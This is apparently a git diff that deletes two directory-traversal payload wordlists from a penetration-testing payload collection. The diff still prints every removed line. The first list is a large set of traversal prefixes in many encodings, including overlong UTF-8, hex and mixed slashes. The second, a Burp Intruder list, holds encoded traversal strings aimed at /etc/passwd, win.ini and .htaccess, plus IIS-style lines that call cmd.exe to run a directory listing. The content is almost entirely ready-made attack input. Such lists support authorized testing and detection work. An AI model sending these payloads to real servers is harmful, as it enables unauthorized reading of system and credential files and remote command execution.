-..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE} -0x2e0x2e/{FILE} -0x2e0x2e/0x2e0x2e/{FILE} -0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -0x2e0x2e0x2f{FILE} -0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -..0x5c{FILE} -..0x5c..0x5c{FILE} -..0x5c..0x5c..0x5c{FILE} -..0x5c..0x5c..0x5c..0x5c{FILE} -..0x5c..0x5c..0x5c..0x5c..0x5c{FILE} -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE} -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE} -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE} -0x2e0x2e\{FILE} -0x2e0x2e\0x2e0x2e\{FILE} -0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -0x2e0x2e0x5c{FILE} -0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -..%c0%2f{FILE} -..%c0%2f..%c0%2f{FILE} -..%c0%2f..%c0%2f..%c0%2f{FILE} -..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE} -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE} -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE} -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE} -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE} -%c0%2e%c0%2e/{FILE} -%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -%c0%2e%c0%2e%c0%2f{FILE} -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -..%c0%5c{FILE} -..%c0%5c..%c0%5c{FILE} -..%c0%5c..%c0%5c..%c0%5c{FILE} -..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE} -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE} -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE} -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE} -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE} -%c0%2e%c0%2e\{FILE} -%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -%c0%2e%c0%2e%c0%5c{FILE} -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -///%2e%2e%2f{FILE} -///%2e%2e%2f%2e%2e%2f{FILE} -///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -\\\%2e%2e%5c{FILE} -\\\%2e%2e%5c%2e%2e%5c{FILE} -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -..//{FILE} -..//..//{FILE} -..//..//..//{FILE} -..//..//..//..//{FILE} -..//..//..//..//..//{FILE} -..//..//..//..//..//..//{FILE} -..//..//..//..//..//..//..//{FILE} -..//..//..//..//..//..//..//..//{FILE} -..///{FILE} -..///..///{FILE} -..///..///..///{FILE} -..///..///..///..///{FILE} -..///..///..///..///..///{FILE} -..///..///..///..///..///..///{FILE} -..///..///..///..///..///..///..///{FILE} -..///..///..///..///..///..///..///..///{FILE} -..\\{FILE} -..\\..\\{FILE} -..\\..\\..\\{FILE} -..\\..\\..\\..\\{FILE} -..\\..\\..\\..\\..\\{FILE} -..\\..\\..\\..\\..\\..\\{FILE} -..\\..\\..\\..\\..\\..\\..\\{FILE} -..\\..\\..\\..\\..\\..\\..\\..\\{FILE} -..\\\{FILE} -..\\\..\\\{FILE} -..\\\..\\\..\\\{FILE} -..\\\..\\\..\\\..\\\{FILE} -..\\\..\\\..\\\..\\\..\\\{FILE} -..\\\..\\\..\\\..\\\..\\\..\\\{FILE} -..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE} -..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE} -./\/./{FILE} -./\/././\/./{FILE} -./\/././\/././\/./{FILE} -./\/././\/././\/././\/./{FILE} -./\/././\/././\/././\/././\/./{FILE} -./\/././\/././\/././\/././\/././\/./{FILE} -./\/././\/././\/././\/././\/././\/././\/./{FILE} -./\/././\/././\/././\/././\/././\/././\/././\/./{FILE} -.\/\.\{FILE} -.\/\.\.\/\.\{FILE} -.\/\.\.\/\.\.\/\.\{FILE} -.\/\.\.\/\.\.\/\.\.\/\.\{FILE} -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE} -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE} -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE} -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE} -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE} -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE} -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE} -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE} -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE} -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE} -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE} -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE} -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE} -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE} -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE} -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE} -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE} -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE} -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE} -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE} -./../{FILE} -./.././../{FILE} -./.././.././../{FILE} -./.././.././.././../{FILE} -./.././.././.././.././../{FILE} -./.././.././.././.././.././../{FILE} -./.././.././.././.././.././.././../{FILE} -./.././.././.././.././.././.././.././../{FILE} -.\..\{FILE} -.\..\.\..\{FILE} -.\..\.\..\.\..\{FILE} -.\..\.\..\.\..\.\..\{FILE} -.\..\.\..\.\..\.\..\.\..\{FILE} -.\..\.\..\.\..\.\..\.\..\.\..\{FILE} -.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE} -.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE} -.//..//{FILE} -.//..//.//..//{FILE} -.//..//.//..//.//..//{FILE} -.//..//.//..//.//..//.//..//{FILE} -.//..//.//..//.//..//.//..//.//..//{FILE} -.//..//.//..//.//..//.//..//.//..//.//..//{FILE} -.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE} -.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE} -.\\..\\{FILE} -.\\..\\.\\..\\{FILE} -.\\..\\.\\..\\.\\..\\{FILE} -.\\..\\.\\..\\.\\..\\.\\..\\{FILE} -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE} -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE} -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE} -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE} -../{FILE} -../..//{FILE} -../..//../{FILE} -../..//../..//{FILE} -../..//../..//../{FILE} -../..//../..//../..//{FILE} -../..//../..//../..//../{FILE} -../..//../..//../..//../..//{FILE} -..\{FILE} -..\..\\{FILE} -..\..\\..\{FILE} -..\..\\..\..\\{FILE} -..\..\\..\..\\..\{FILE} -..\..\\..\..\\..\..\\{FILE} -..\..\\..\..\\..\..\\..\{FILE} -..\..\\..\..\\..\..\\..\..\\{FILE} -..///{FILE} -../..///{FILE} -../..//..///{FILE} -../..//../..///{FILE} -../..//../..//..///{FILE} -../..//../..//../..///{FILE} -../..//../..//../..//..///{FILE} -../..//../..//../..//../..///{FILE} -..\\\{FILE} -..\..\\\{FILE} -..\..\\..\\\{FILE} -..\..\\..\..\\\{FILE} -..\..\\..\..\\..\\\{FILE} -..\..\\..\..\\..\..\\\{FILE} -..\..\\..\..\\..\..\\..\\\{FILE} -..\..\\..\..\\..\..\\..\..\\\{FILE} \ No newline at end of file diff --git a/Directory Traversal/Intruder/directory_traversal.txt b/Directory Traversal/Intruder/directory_traversal.txt deleted file mode 100644 index a8bece0..0000000 --- a/Directory Traversal/Intruder/directory_traversal.txt +++ /dev/null @@ -1,140 +0,0 @@ -\..\WINDOWS\win.ini -\..\..\WINDOWS\win.ini -\..\..\..\WINDOWS\win.ini -\..\..\..\..\WINDOWS\win.ini -\..\..\..\..\..\WINDOWS\win.ini -\..\..\..\..\..\..\WINDOWS\win.ini -%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 -%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 -%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 -%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 -..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -../../../../../../../../../etc/passwd -../../../../../../../../etc/passwd -../../../../../../../etc/passwd -../../../../../../etc/passwd -../../../../../etc/passwd -../../../../etc/passwd -../../../etc/passwd -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 -../../../.htaccess -../../.htaccess -../.htaccess -.htaccess -././.htaccess -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 -%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 -%2e%2e%2f%2e%68%74%61%63%63%65%73%73 -%2e%68%74%61%63%63%65%73%73 